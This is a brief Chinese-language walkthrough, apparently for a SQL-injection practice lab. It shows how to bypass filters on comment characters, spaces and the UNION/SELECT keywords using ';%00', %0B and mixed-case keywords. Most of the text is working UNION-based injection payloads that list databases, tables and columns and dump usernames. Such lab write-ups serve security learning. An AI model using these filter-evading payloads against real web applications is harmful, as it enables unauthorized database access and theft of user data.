一、这把过滤了注释符,空格,union和select
二、输入id,有显示位,继续用联合查询。闭合符号的话代码里给id添加了双引号,所以闭合符号就是双引号
三、添加注释符来注释查询时后面的语句,因为注释符被过滤,所以用;%00代替
?id=1;%00
四、判断显示位,过滤了空格用%0b代替,select和union用大小写交替绕过
?id=100"%0BuNiOn%0BSeLeCt%0B1,2,3;%00
五、爆数据库
?id=100"%0BuNiOn%0BSeLeCt%0B1,(SeLeCt%0Bgroup_concat(schema_name)%0Bfrom%0Binformation_schema.schemata),3;%00
六、爆当前数据库所有表名
?id=100"%0BuNiOn%0BSeLeCt%0B1,(SeLeCt%0Bgroup_concat(table_name)%0Bfrom%0Binformation_schema.tables%0Bwhere%0Btable_schema=database()),3;%00
七、爆指定表所有列名
?id=100"%0BuNiOn%0BSeLeCt%0B1,(SeLeCt%0Bgroup_concat(column_name)%0Bfrom%0Binformation_schema.columns%0Bwhere%0Btable_name='users'),3;%00
八、爆指定列所有数据
?id=100"%0BuNiOn%0BSeLeCt%0B1,(SeLeCt%0Bgroup_concat(username)%0Bfrom%0Busers),3;%00
over~